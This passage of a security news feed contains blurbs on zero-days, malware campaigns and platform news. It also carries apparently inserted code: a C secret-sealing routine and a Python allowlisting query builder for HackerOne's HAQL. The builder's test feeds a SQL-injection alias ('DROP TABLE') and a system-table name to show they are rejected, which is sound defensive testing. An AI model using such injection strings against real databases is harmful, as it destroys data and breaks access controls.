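/* Step 1: allocate memory and pin it so it is never written to the pagefile. */
static void *lock_alloc(size_t n) {
#ifdef _WIN32
    void *p = VirtualAlloc(NULL, n, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (p && !VirtualLock(p, n)) { VirtualFree(p, 0, MEM_RELEASE); return NULL; }
    return p;
#else
    void *p = NULL;
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    if (posix_memalign(&p, page, n) != 0) return NULL;
    if (mlock(p, n) != 0) { free(p); return NULL; }
    return p;
#endif
}

/* Step 8: secure erasure, then unlock and release. */
static void lock_free(void *p, size_t n) {
    if (!p) return;
    secure_zero(p, n);
#ifdef _WIN32
    VirtualUnlock(p, n); VirtualFree(p, 0, MEM_RELEASE);
#else
    munlock(p, n); free(p);
#endif
}

/* Keystream from the OS RNG: rand_s on Windows, /dev/urandom elsewhere. */
static int fill_random(uint8_t *k, size_t n) {
#ifdef _WIN32
    for (size_t i = 0; i < n; i++) { unsigned r; if (rand_s(&r)) return -1; k[i] = (uint8_t)r; }
    return 0;
#else
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t got = fread(k, 1, n, f);
    fclose(f);
    return got == n ? 0 : -1;
#endif
}

/* Steps 2-4: copy the secret into locked memory, XOR it in place, and wipe
 * the caller's plaintext so the sealed copy is the only one left. */
static int secret_seal(secret_buf *s, uint8_t *plain, size_t len) {
    s->len = len; s->sealed = 0;
    s->data = lock_alloc(len);
    s->key  = lock_alloc(len);
    if (!s->data || !s->key || fill_random(s->key, len) != 0) {
        lock_free(s->data, len); lock_free(s->key, len);
        s->data = s->key = NULL;
        return -1;
    }
    memcpy(s->data, plain, len);
    secure_zero(plain, len);
    for (size_t i = 0; i < len; i++) s->data[i] ^= s->key[i];
    s->sealed = 1;
    return 0;
}

/* Step 7: decrypt only on demand, into a caller-owned buffer (ideally one
 * from lock_alloc) that the caller wipes as soon as it is done with it. */
static int secret_open(const secret_buf *s, uint8_t *out, size_t outlen) {
    if (!s->sealed || outlen < s->len) return -1;
    for (size_t i = 0; i < s->len; i++) out[i] = s->data[i] ^ s->key[i];
    return 0;
}

static void secret_wipe(secret_buf *s) {
    lock_free(s->data, s->len); lock_free(s->key, s->len);
    s->data = s->key = NULL; s->len = 0; s->sealed = 0;
}

/* The check the article performs by hand in Process Hacker's Strings view:
 * is the plaintext byte sequence still present in the buffer? */
static int buffer_contains(const uint8_t *hay, size_t hlen,
                           const uint8_t *needle, size_t nlen) {
    if (nlen == 0 || hlen < nlen) return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return 1;
    return 0;
}
```

After secret_seal the only copy of the secret lives XOR-masked in locked memory; a strings search over the process finds neither the caller's original array (wiped) nor the sealed buffer, which is what the article's Process Hacker check is looking for.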
by InfoSec Write-ups
2024-11-16 17:39:06
Palo Alto Networks confirmed active exploitation of recently disclosed zero-day
Palo Alto Networks confirmed active exploitation of a zero-day in its PAN-OS firewall and released new indicators of compromise (IoCs). Last week, Palo Alto Networks warned customers to limit access to their next-gen firewall management interface due to a potential remote code execution vulnerability (CVSSv4.0 Base Score: 9.3) in PAN-OS. The cybersecurity company had no […]
by Security Affairs
2024-11-16 17:02:23
Cybersecurity Flaws in US Drinking Water Systems Put 26 Million at Risk
The U.S. Environmental Protection Agency (EPA) Report Exposes Cybersecurity Risks in US Water Systems: Vulnerabilities in Critical Drinking…
by Hackread
2024-11-16 16:26:02
Chinese Hackers Exploit Fortinet Zero-Day to Steal VPN Credentials
This flaw allows attackers to extract VPN credentials directly from memory, a tactic used in conjunction with the DEEPDATA malware to gather sensitive information from compromised systems. Despite being reported to Fortinet in July 2024, the issue remains unresolved. Discovery and Fortinet's inaction Volexity's researchers identified the zero-day vulnerability during the analysis of the DEEPDATA … The post Chinese Hackers Exploit Fortinet Zero-Day to Steal VPN Credentials appeared first on CyberInsider.
by Cyber Insider
2024-11-16 15:54:36
T-Mobile hack linked to Chinese breaches of telecom networks
This is the ninth known cyberattack to target T-Mobile in recent years, according to an ongoing count by TechCrunch. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-11-16 15:14:21
Fake AI video generators infect Windows, macOS with infostealers
Fake AI image and video generators infect Windows and macOS with the Lumma Stealer and AMOS information-stealing malware, used to steal credentials and cryptocurrency wallets from infected devices. [...]
by BleepingComputer
2024-11-16 15:05:00
What a second Trump term means for the future of ransomware
The U.S. government has made big strides over the past four years in the ongoing fight against the “scourge of ransomware,” as President Joe Biden described it. At the start of his term, Biden and his administration were quick to declare ransomware a national security threat, unlocking new powers for the military and intelligence agencies. […]
by TechCrunch
2024-11-16 13:51:00
PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released
Palo Alto Networks has released new indicators of compromise (IoCs) a day after the network security vendor confirmed that a zero-day vulnerability impacting its PAN-OS firewall management interface has been actively exploited in the wild. To that end, the company said it observed malicious activity originating from the IP addresses listed below and targeting PAN-OS management web interface IP addresses
by The Hacker News
2024-11-16 12:47:00
T-Mobile confirms it was hacked in recent wave of telecom breaches
T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. [...]
by BleepingComputer
2024-11-16 11:55:00
Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials
A threat actor known as BrazenBamboo has exploited an unresolved security flaw in Fortinet's FortiClient for Windows to extract VPN credentials as part of a modular framework called DEEPDATA. Volexity, which disclosed the findings Friday, said it identified the zero-day exploitation of the credential disclosure vulnerability in July 2024, describing BrazenBamboo as the developer behind DEEPDATA,
by The Hacker News
2024-11-16 11:47:31
NSO Group used WhatsApp exploits even after Meta-owned company sued it
Court filings revealed that NSO Group used WhatsApp exploits after the instant messaging firm sued the surveillance company. NSO Group developed malware that relied on WhatsApp exploits to infect target individuals even after the Meta-owned instant messaging company sued the surveillance firm. “As a threshold matter, NSO admits that it developed and sold the spyware […]
by Security Affairs
2024-11-16 11:30:00
Bitfinex Hacker Gets 5 Years for $10 Billion Bitcoin Heist
Plus: An “AI granny” is wasting scammers’ time, a lawsuit goes after spyware-maker NSO Group’s executives, and North Korea–linked hackers take a crack at macOS malware.
by WIRED Security News
2024-11-16 10:30:29
GitHub projects targeted with malicious commits to frame researcher
GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions. [...]
by BleepingComputer
2024-11-16 04:21:42
Hardware Hacking : Getting UART Shells
Hey, I know it's too late, but when I tried “bsnl” and “admin” it throws “Password is incorrect”. Any idea?!
by HACKLIDO
2024-11-15 23:27:00
Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations
Cybersecurity researchers have shed light on a new remote access trojan and information stealer used by Iranian state-sponsored actors to conduct reconnaissance of compromised endpoints and execute malicious commands. Cybersecurity company Check Point has codenamed the malware WezRat, stating it has been detected in the wild since at least September 1, 2023, based on artifacts uploaded to the
by The Hacker News
2024-11-15 22:52:16
Microsoft Pulls Exchange Patches Amid Mail Flow Issues
Email at many organizations has stopped working; the tech giant has advised users who are facing the issue to uninstall the updates so that it can address the flaw.
by Dark Reading
2024-11-15 22:21:57
ChatGPT Exposes Its Instructions, Knowledge & OS Files
According to Mozilla, users have a lot more power to manipulate ChatGPT than they might realize. OpenAI hopes those manipulations remain within a clearly delineated sandbox.
by Dark Reading
2024-11-15 21:44:00
Beyond patches and firewalls: Advanced strategies for cyberthreat defense
Threat mitigation is to MSPs what preventative medicine is to doctors. In other words, threat mitigation is the first line – and often least expensive – defense against cybercriminals.
by Barracuda
2024-11-15 20:52:53
NSO Group admits cutting off 10 customers because they abused its Pegasus spyware, say unsealed court documents
Newly unsealed documents brought by a WhatsApp lawsuit show NSO Group's spyware, Pegasus, was used to hack as many as “tens of thousands” of devices.
by TechCrunch
2024-11-15 20:42:38
European Club and Media Giant Abandon X Amid Growing Hate Speech Concerns
A popular European football club and a media giant are the latest in a growing list of organizations to abandon X. The reason? Growing concerns over hate speech and disinformation. FC St. Pauli’s recent exit from X (formerly known as Twitter) signals growing frustration with the platform’s inability, or unwillingness, to address harmful content. The German football club, known for its progressive stance on social issues, accused Elon Musk of transforming X into a breeding ground for hate and conspiracy theories. The club noted its concerns over the platform's potential influence on Germany's upcoming parliamentary elections set to take place in February.

FC St. Pauli's Stand Against Hate
With 250,000 followers, FC St. Pauli joined X in 2013, initially using the platform to engage fans. However, Musk’s ownership, marked by a laissez-faire approach to content moderation, shifted the narrative. The club cited rising racism and unchecked conspiracy theories as key reasons for its decision to withdraw. “The space for debate has turned into an amplifier of hate,” the club stated, showcasing X’s role in shaping divisive public discourse. The account, while inactive moving forward, will remain online as a historical archive. FC St. Pauli has urged followers to migrate to BlueSky, a decentralized social media platform that promotes diversity and inclusion.

The Guardian Joins the Abandon X Movement
Joining the exodus, The Guardian announced its departure from X, citing similar concerns about hate speech and far-right conspiracies. With over 27 million followers across 80 accounts, the decision underscores significant discontent from media organizations. “We’ve observed disturbing content, including racism and far-right conspiracy theories, for a while,” The Guardian explained, adding that X’s coverage of the U.S. presidential election solidified its choice. Although its official accounts will go silent, individual reporters can continue using the platform under existing social media guidelines. The organization also reassured readers that articles could still be shared on X.

BlueSky as an Alternative
Organizations like FC St. Pauli are pointing users toward BlueSky as a safer, community-focused alternative. BlueSky operates on a decentralized model, meaning it isn’t controlled by a single entity. This approach gives users greater control over content moderation and ensures no overarching authority influences public discourse. BlueSky, which emerged from Twitter’s former CEO Jack Dorsey’s vision, uses the AT Protocol to foster interoperability and transparency. It allows users to customize their social experience, curating feeds based on their interests while minimizing exposure to hate speech and misinformation. Although still in its beta phase, BlueSky has attracted users seeking refuge from platforms like X, where harmful content has grown pervasive.

Growing Criticism of Musk
Musk’s self-proclaimed “free speech absolutism” has drawn sharp criticism from anti-hate groups and the European Union. Under his leadership, X reinstated controversial figures such as conspiracy theorist Alex Jones and far-right activist Tommy Robinson, sparking global outrage. Musk's recent appointment as the head of a U.S. government efficiency effort by President-elect Donald Trump further exacerbates concerns about X’s role in political propaganda. Critics argue that the platform risks becoming a tool to amplify far-right ideologies, particularly during sensitive election periods. New revelations of election misinformation spread by a Musk-funded super PAC will only exacerbate those concerns.

Industry Reactions
FC St. Pauli and The Guardian are not alone in their departure. This year, several institutions, including NPR, PBS, and the Berlin Film Festival, have left X, citing the platform’s failure to curb hate speech and uphold values of inclusivity. North Wales Police also stopped using X, citing ethical misalignment, while the Royal National Orthopaedic Hospital left due to an “increased volume of hate speech.” Despite these exits, some argue the platform remains indispensable for real-time news. Socialdatabase founder Thomas Slabbers tweeted, “There’s no news without X,” highlighting its continued relevance in journalism. X CEO Linda Yaccarino dismissed concerns, claiming record-high user engagement under her leadership. “You will always have a place to engage freely and safely,” she tweeted. Musk, on the other hand, labeled The Guardian a “laboriously vile propaganda machine.”

Advertisers Return Amid Controversy
In a surprising twist, major corporations like IBM, Disney, and Warner Bros have resumed advertising on X after a year-long boycott. The shift reflects efforts to rebuild trust under Yaccarino’s leadership. However, it raises questions about corporate ethics in the face of rising hate speech on the platform.

A Divided Digital Landscape
As more organizations leave X, the platform faces an identity crisis. Is it a space for free speech, or a tool for amplifying harmful ideologies? The exits of prominent entities like FC St. Pauli and The Guardian suggest the latter, signaling a call for accountability in social media governance. BlueSky’s rising popularity signals a desire for decentralized platforms where user control takes precedence. While still developing, it offers a promising alternative to X’s increasingly polarizing ecosystem. For now, the digital landscape remains divided, reflecting a larger societal debate about free speech, responsibility, and the future of online discourse.
by The Cyber Express
2024-11-15 19:40:45
Tactical Guide to Threat Hunting in Snowflake EnvironmentsIt was brought to our attention that a threat actor has been observed using stolen customer credentials to target organizations utilizing Snowflake databases.
by Mitiga
2024-11-15 19:34:00
Media Release: USCYBERCOM Executes International Coordinated Cyber Security Activity 2024This month, U.S. Cyber Command launched the second iteration of the International Coordinated Cyber Security Activity (INCCA), a focused defensive cyberspace operation aimed at strengthening Department of Defense (DoD) networks and enhancing global cybersecurity partnerships.
by U.S. Cyber Command News
2024-11-15 19:00:00
Think you need a VPN? Start here.Not everyone actually needs to use a VPN. This simple guide will help you decide if you need a VPN for your situation. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-11-15 18:05:00
Researchers Warn of Privilege Escalation Risks in Google's Vertex AI ML PlatformCybersecurity researchers have disclosed two security flaws in Google's Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud. "By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project," Palo Alto Networks
by The Hacker News
2024-11-15 17:27:00
The best secure browsers for privacy in 2024: Expert testedThe best security-focused browsers offer privacy features, ad blockers, private searches, and pledge never to sell your data. Here are the best options in 2024.
by ZDNET Security
2024-11-15 17:18:00
Live Webinar: Dive Deep into Crypto Agility and Certificate ManagementIn the fast-paced digital world, trust is everything, but what happens when that trust is disrupted? Certificate revocations, though rare, can send shockwaves through your operations, impacting security, customer confidence, and business continuity. Are you prepared to act swiftly when the unexpected happens? Join DigiCert's exclusive webinar, "When Shift Happens: Are You Ready for Rapid
by The Hacker News
2024-11-15 16:51:25
8.8 Rated PostgreSQL Vulnerability Puts Databases at RiskCybersecurity researchers at Varonis have identified a serious security vulnerability in PostgreSQL that could lead to data breaches…
by Hackread
2024-11-15 16:42:00
Vietnamese Hacker Group Deploys New PXA Stealer Targeting Europe and AsiaA Vietnamese-speaking threat actor has been linked to an information-stealing campaign targeting government and education entities in Europe and Asia with a new Python-based malware called PXA Stealer. The malware "targets victims' sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software,"
by The Hacker News
2024-11-15 16:25:51
Malicious QR codes sent in the mail deliver malwareA QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.
by Malwarebytes Labs
2024-11-15 16:19:12
Holiday 2024: The Bot Battle for Black Friday and Cyber MondayThe battle between humans and bots is heating up, with Black Friday and Cyber Monday standing as prime targets. Some “Black Friday” holiday shopping events have already begun. Based on Kasada’s 2023 findings, the trends observed last year offer valuable insights and preparation strategies for 2024. With threat actors more sophisticated than ever, retailers must...
by RH-ISAC
2024-11-15 16:05:12
Surfshark VPN review: One of our favorite budget VPNs with unlimited connectionsAs VPNs go, Surfshark is a well-rounded option with competitive pricing, but there are a few caveats.
by ZDNET Security
2024-11-15 16:00:00
How Runtime Insights Help with Container SecurityContainers are a key building block for cloud workloads, offering flexibility, scalability, and speed for deploying applications. But as organizations... The post How Runtime Insights Help with Container Security appeared first on Sysdig.
by Sysdig
2024-11-15 16:00:00
How AI Is Transforming IAM and Identity SecurityIn recent years, artificial intelligence (AI) has begun revolutionizing Identity Access Management (IAM), reshaping how cybersecurity is approached in this crucial field. Leveraging AI in IAM is about tapping into its analytical capabilities to monitor access patterns and identify anomalies that could signal a potential security breach. The focus has expanded beyond merely managing human
by The Hacker News
2024-11-15 15:08:05
Microsoft Power Pages Misconfigurations Expose Millions of Records GloballySaaS Security firm AppOmni has identified misconfigurations in Microsoft Power Pages that can lead to severe data breaches.…
by Hackread
2024-11-15 15:07:36
Flexible Data Retrieval at Scale with HAQL
Robert Coleman, Fri, 11/15/2024 - 07:07

What is HAQL?
Back in 2022, we were faced with a challenge: we wanted to build useful, actionable dashboards for our customers, and we wanted to build them fast. We had the data, we had the context, and we had the designs, but we were missing a way to scale the process of data wrangling for each additional data visualization. We built helper classes, DRY'd, and abstracted away code, but we still found ourselves bogged down writing opaque Arel queries that were prone to error and difficult to debug. On top of that, trying to optimize for performance while navigating a complex database authorization layer led to difficult tradeoffs between load times and security.

Enter HAQL. Rather than struggle through defining each query in ActiveRecord, Arel, or risky raw SQL blocks, why not simplify the interface and focus on the specific needs of a fast analytics query engine? At its core, HAQL is just that: a simplified query interface for writing performant aggregate queries on tables modeled purposefully for data analysis. On the backend, HAQL consists of a Ruby class that constructs Arel nodes from a given input, enabling fine-grained control over the available schema, authorization, database functions, data types, output formats, database connections, row limits, error handling, and more. The query inputs themselves are highly structured and strictly typed, which makes it easier to validate inputs, reject malicious payloads, and enforce access controls. And most importantly for our original use case, the structured inputs and outputs grant us the ability to rapidly build new dashboards. We leveraged this HAQL response contract to write reusable React components on the frontend for all our most common data visualizations; now a chart becomes a configuration, and creating a new dashboard becomes a low-code activity. So how does it work?

A preview of platform features enabled by HAQL

The Anatomy of a HAQL Query
A HAQL query has many of the familiar components of a SQL query: a required select statement along with optional where predicates, join statements, order by specifications, and limit directives. Queries are typically executed via GraphQL, but can also be defined explicitly as JSON. Let's look at an example.

With this query, we're retrieving the sum of bounties grouped by asset in the select statement. We join the assets table to the bounties table in the join statement, and specify the join conditions via a series of predicates. Finally, we order the results by the summed bounty amount.

Behind the scenes in our Rails backend, each query component is parsed, validated, and incorporated as a node in an Arel query. At this point, we also apply authorization predicates and other safeguards against improper access. Results are then returned in a key-value format that's compatible with GraphQL. In PostgreSQL, the above query would translate to:

Though a simple interface, HAQL allows for quite complex queries. We've found that in combination with reusable frontend components and well-defined patterns for grouping related queries, HAQL has brought down the time to build a new dashboard from weeks to hours in typical use cases.

Investing in Catalysts
It's often the case in the world of engineering that small improvements have reverberations greatly exceeding the initial problem in scale. Discovering these force multipliers is more art than science, but with HAQL we found out almost immediately that there were a number of applications, many of which were completely unexpected. One of the most exciting opportunities for HAQL is its relationship to Hai, HackerOne's AI copilot.
HAQL's schema is naturally dense with information and highly structured, making it easy for Hai to learn the language via conventional Retrieval Augmented Generation (RAG) techniques and enabling Hai to fetch, analyze, and render data as an agent in real time. Without this analytics query layer, our Hai developers would've been required to hand-engineer data access rules and schematic context to coax generated SQL from an LLM, they would've needed to write parsers for validation, and they would've been forced to implement complex logic for handling diverse response formats. Instead, a relatively simple addition to the LLM's system prompt unlocks a powerful new functionality: context-aware, chat-based insights across the HackerOne platform. As an added benefit, simple yet strict authorization rules give us greater confidence in Hai's ability to safely execute HAQL queries, and support for rich metadata allows us to "steer" LLMs towards more reliable queries that wouldn't have been possible otherwise.

Limitations
In the age-old tradeoff of build vs. buy vs. open source, HAQL is no exception. Are there other tools that could have potentially helped us solve this problem? Of course. Are there downsides to managing a homegrown custom query engine in a Rails app? For sure. Are there unknown risks we haven't uncovered yet? Definitely. The verbose syntax may also feel heavy-handed for experienced SQL users at first, and for more complex operations such as subqueries, CTEs, unions, and the like, HAQL is not the best option (yet). But there's always the right tool for the right job, and at HackerOne, HAQL is a powerful one to have in the toolbox.

Looking Forward
In the future, we expect HAQL to have uses that go far beyond powering dashboards. It already enables a handful of REST API endpoints, and in the future, it will likely be queryable directly via the API.
The number of datasets available in the HAQL schema has also been growing steadily to cover a greater share of HackerOne's product suite. Finally, the integration with Hai is sure to attract additional product and engineering investment as we discover creative new ways to surface and interact with data. We only anticipate these capabilities to grow in what is turning out to be a very exciting time for cybersecurity and technology as a whole.
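The post describes two properties of HAQL that matter for security: the query is a typed structure validated against a known schema before any SQL exists, and authorization predicates are added by the server rather than trusted from the client (or, in the Hai case, from an LLM). The following is an added example in that spirit, not HackerOne's HAQL code: a small Python builder for a hypothetical schema (the tables bounties and assets, the columns, the "team_id" tenant column and the "%s" DB-API placeholder style are all assumptions). It takes the same shape of request the post walks through (sum of bounties grouped by asset, assets joined to bounties, ordered by the summed amount), rejects anything outside the allowlist, and pins every scoped table to the caller's tenant.

```python
import re

# Allowlisted schema (hypothetical tables, not HackerOne's): table -> columns.
# Anything the client names that is not here is rejected before any SQL exists.
SCHEMA = {
    "bounties": {"id", "asset_id", "amount", "team_id"},
    "assets": {"id", "name", "team_id"},
}
AGGREGATES = {"sum", "count", "avg", "min", "max"}
OPERATORS = {"=", "<>", "<", "<=", ">", ">=", "in"}
SCOPE_COLUMN = "team_id"   # tables carrying this column get a server-side tenant predicate
MAX_LIMIT = 1000
ALIAS = re.compile(r"^[a-z_][a-z0-9_]{0,30}$")


class QueryError(ValueError):
    """Input outside the allowlisted grammar."""


def _column(ref, tables):
    """Accept only 'table.column' where both halves are allowlisted and the
    table is actually in this query's FROM/JOIN set."""
    if not isinstance(ref, str) or ref.count(".") != 1:
        raise QueryError(f"bad column reference {ref!r}")
    table, col = ref.split(".")
    if table not in tables or col not in SCHEMA[table]:
        raise QueryError(f"unknown column {ref!r}")
    return ref


def build(query, caller_team_id):
    """Validate a structured query and return (sql, params) scoped to caller_team_id."""
    base = query.get("from")
    if base not in SCHEMA:
        raise QueryError(f"unknown table {base!r}")
    tables, joins = [base], []
    for j in query.get("join", []):
        t = j.get("table")
        if t not in SCHEMA or t in tables:
            raise QueryError(f"bad join table {t!r}")
        tables.append(t)
        on = [f"{_column(c.get('left'), tables)} = {_column(c.get('right'), tables)}"
              for c in j.get("on", [])]
        if not on:
            raise QueryError("join without predicate")
        joins.append(f"JOIN {t} ON " + " AND ".join(on))

    select, group_by, aliases = [], [], set()
    for item in query.get("select", []):
        col, fn = _column(item.get("column"), tables), item.get("function")
        if fn is None:
            select.append(col)
            group_by.append(col)
            continue
        if fn not in AGGREGATES:
            raise QueryError(f"function {fn!r} not allowed")
        alias = item.get("as")
        if not isinstance(alias, str) or not ALIAS.match(alias) or alias in aliases or alias in SCHEMA:
            raise QueryError(f"bad alias {alias!r}")
        aliases.add(alias)
        select.append(f"{fn}({col}) AS {alias}")
    if not select:
        raise QueryError("empty select")

    where, params = [], []
    for p in query.get("where", []):
        col, op, val = _column(p.get("column"), tables), p.get("op"), p.get("value")
        if op not in OPERATORS:
            raise QueryError(f"operator {op!r} not allowed")
        if op == "in":
            if not isinstance(val, list) or not val:
                raise QueryError("IN needs a non-empty list")
            where.append(f"{col} IN ({', '.join(['%s'] * len(val))})")
            params.extend(val)
        else:
            where.append(f"{col} {op} %s")   # value travels as a bound parameter, never as text
            params.append(val)
    # Authorization is appended by the server for every scoped table in the
    # query; the client cannot omit, weaken or override it.
    for t in tables:
        if SCOPE_COLUMN in SCHEMA[t]:
            where.append(f"{t}.{SCOPE_COLUMN} = %s")
            params.append(caller_team_id)

    order = []
    for o in query.get("order_by", []):
        key = o.get("alias")
        target = key if key in aliases else _column(o.get("column"), tables)
        order.append(f"{target} {'DESC' if str(o.get('dir', 'asc')).lower() == 'desc' else 'ASC'}")

    limit = query.get("limit", MAX_LIMIT)
    if type(limit) is not int or not 1 <= limit <= MAX_LIMIT:
        raise QueryError(f"limit must be an int in 1..{MAX_LIMIT}")

    parts = ["SELECT " + ", ".join(select), f"FROM {base}", *joins]
    if where:
        parts.append("WHERE " + " AND ".join(where))
    if group_by and aliases:   # group only when something is being aggregated
        parts.append("GROUP BY " + ", ".join(group_by))
    if order:
        parts.append("ORDER BY " + ", ".join(order))
    parts.append(f"LIMIT {limit}")
    return " ".join(parts), params


# Constructed request mirroring the post's description: sum of bounties grouped
# by asset, assets joined to bounties, ordered by the summed amount.
EXAMPLE_QUERY = {
    "from": "bounties",
    "join": [{"table": "assets", "on": [{"left": "bounties.asset_id", "right": "assets.id"}]}],
    "select": [{"column": "assets.name"},
               {"function": "sum", "column": "bounties.amount", "as": "total"}],
    "where": [{"column": "bounties.amount", "op": ">", "value": 100}],
    "order_by": [{"alias": "total", "dir": "desc"}],
    "limit": 10,
}


def rejects(query, caller_team_id=42):
    """True if the builder refuses the query; shows what cannot get through."""
    try:
        build(query, caller_team_id)
    except QueryError:
        return True
    return False


if __name__ == "__main__":
    sql, params = build(EXAMPLE_QUERY, caller_team_id=42)
    print(sql)
    print(params)
    print(rejects({**EXAMPLE_QUERY, "from": "pg_shadow"}))
    print(rejects({**EXAMPLE_QUERY, "select": [{"function": "sum", "column": "bounties.amount",
                                                "as": "t; DROP TABLE assets--"}]}))
```

The point of the design is that an LLM (or a hostile client) can only ever choose among allowlisted tables, columns, functions and operators; the one thing it cannot express is the tenant scope, which the server adds itself, so a generated query that names another team's rows still comes back scoped to the caller.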
by HackerOne
2024-11-15 15:06:32
Phishing Attacks Exploit Microsoft Visio Files and SharePointThreat actors are exploiting Microsoft Visio files and SharePoint to launch two-step phishing attacks, according to researchers at Perception Point.
by KnowBe4
2024-11-15 15:05:57
Half of all Ransomware Attacks This Year Targeted Small BusinessesNew data shows just how crippling ransomware has been on small businesses that have fallen victim to an attack and needed to pay the ransom.
by KnowBe4
2024-11-15 15:00:00
Combating the Rise of Federally Aimed Malicious IntentIn the future, the cybersecurity landscape likely will depend not only on the ability of federal workforces to protect their agencies but also on their capacity to continuously develop and sharpen those skills.
by Dark Reading
2024-11-15 14:36:02
Lessons From OSC&R on Protecting the Software Supply ChainA new report from the Open Software Supply Chain Attack Reference (OSC&R) team provides a framework to reduce how much vulnerable software reaches production.
by Dark Reading
2024-11-15 14:13:56
AI in SecOps: How AI is Impacting Red and Blue Team Operations
HackerOne, Fri, 11/15/2024 - 06:13

Integrating AI into SOCs
The integration of AI into security operations centers (SOCs) and its impact on the workforce are pivotal aspects of successful AI adoption and trust building. According to the survey data, AI is significantly influencing security operations and reshaping roles within those organizations. Approximately 66% of applicable respondents indicated they are using AI in their SOCs, underscoring the growth AI has experienced in this area of security. AI's effectiveness in the SOC is further demonstrated by the ability to automate various tasks that might otherwise consume an inordinate amount of time. A whopping 82% found AI useful for improving threat detection, an expected result because AI can easily assist in the analysis of adversary tactics, techniques, and procedures (TTPs) and crafting of associated detections. Approximately 62% of organizations are using AI to automate incident prioritization and response, minimizing potential downsides and tedious, time-wasting tasks better suited to automated systems. Another excellent use of the technology, found in 56% of respondents, is supporting faster investigations with improved data correlation across multiple sources.

The Security Researcher Perspective
"As an engineer doing AI development for my company, AppOmni, MLSecOps and AISecOps are 100% happening. It's pretty difficult to turn them into a production, and I do think they're going to blow up. People should dig in and learn it because it's going to be highly applicable to every company. In three or five years' time, every good engineer is going to have to know how to use and implement LLM technology and other generative AI technology."
Joseph Thacker aka @rez0_, Security Researcher specializing in AI

AI for Red and Blue Team Operations
Our survey found that AI is making significant inroads in both red and blue team operations. Of the 30% who use AI in their red team activities, 74% are leveraging AI to simulate more sophisticated cyber-attacks in their red team training. Approximately 62% of our respondents indicated that AI is used to create more realistic attack simulations, better preparing blue teams for emerging threats. A little over 57% of respondents found that cross-training exercises using AI tools provided better skills and learning opportunities for red/blue activities. Other notable areas include a deeper understanding of threats and vulnerabilities (52%) and automated sharing of attack insights with blue teams for faster feedback (50%). We cannot overstate this: Red teams exist to make blue teams stronger. AI-positive integrations between red and blue team activities only help strengthen the organization's overall security posture and encourage adoption of AI technologies. However, as we noted earlier, respondents are concerned with the highly complex and ethical issues of using AI in offensive security operations. Furthermore, approximately 36% of respondents indicated that red teams might have an issue keeping up with rapidly evolving AI defenses deployed by blue teams.

Want to learn more about how AI is impacting cybersecurity and prepare for the future of AI in SecOps? Check out the full survey results and analysis in the report: SANS 2024 AI Survey.
by HackerOne
2024-11-15 14:00:00
Cybersecurity dominates concerns among the C-suite, small businesses and the nationOnce relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data […] The post Cybersecurity dominates concerns among the C-suite, small businesses and the nation appeared first on Security Intelligence.
by Security Intelligence
2024-11-15 13:52:55
Cybercriminals hijack DNS to build stealth attack networksHijacking domains using a ‘Sitting Ducks attack’ remains an underrecognized topic in the cybersecurity community. Few threat researchers are familiar with this attack vector, and knowledge is scarce. However, the prevalence of these attacks and the risk to organizations are significant. Infoblox researchers estimate that over 1 million registered domains could be vulnerable daily. More evidence found on Sitting Ducks Attacks During a Sitting Ducks attack, the malicious actor gains control of a domain by … More → The post Cybercriminals hijack DNS to build stealth attack networks appeared first on Help Net Security.
by Help Net Security
2024-11-15 13:23:55
Cyber crooks push Android malware via letterCyber crooks are trying out an interesting new approach for getting information-stealing malware installed on Android users’ smartphones: a physical letter impersonating MeteoSwiss (i.e., Switzerland’s Federal Office of Meteorology and Climatology). “The letter asks the recipients to install a new severe weather app. However, there is no such federal app with the name mentioned. Rather, the QR code shown in the letter leads to the download of malware called ‘Coper’ (also known as ‘Octo2’),” the … More → The post Cyber crooks push Android malware via letter appeared first on Help Net Security.
by Help Net Security
2024-11-15 13:00:00
Trump 2.0 May Mean Fewer Cybersecurity Regs, Shift in ThreatsGiven increased tensions with China over tariffs, companies could see a shift in attacks, but also fewer regulations and a run at a business-friendly federal privacy law.
by Dark Reading
2024-11-15 12:42:00
Retrofitting spatial safety to hundreds of millions of lines of C++
Posted by Alex Rebert and Max Shavrick, Security Foundations, and Kinuko Yasuda, Core Developer

Attackers regularly exploit spatial memory safety vulnerabilities, which occur when code accesses a memory allocation outside of its intended bounds, to compromise systems and sensitive data. These vulnerabilities represent a major security risk to users. Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade:

Figure: Breakdown of memory safety CVEs exploited in the wild by vulnerability class. [1]

Google is taking a comprehensive approach to memory safety. A key element of our strategy focuses on Safe Coding and using memory-safe languages in new code. This leads to an exponential decline in memory safety vulnerabilities and quickly improves the overall security posture of a codebase, as demonstrated by our post about Android's journey to memory safety. However, this transition will take multiple years as we adapt our development practices and infrastructure. Ensuring the safety of our billions of users therefore requires us to go further: we're also retrofitting secure-by-design principles to our existing C++ codebase wherever possible.

To that end, we're working towards bringing spatial memory safety into as many of our C++ codebases as possible, including Chrome and the monolithic codebase powering our services. We've begun by enabling hardened libc++, which adds bounds checking to standard C++ data structures, eliminating a significant class of spatial safety bugs. While C++ will not become fully memory-safe, these improvements reduce risk as discussed in more detail in our perspective on memory safety, leading to more reliable and secure software.

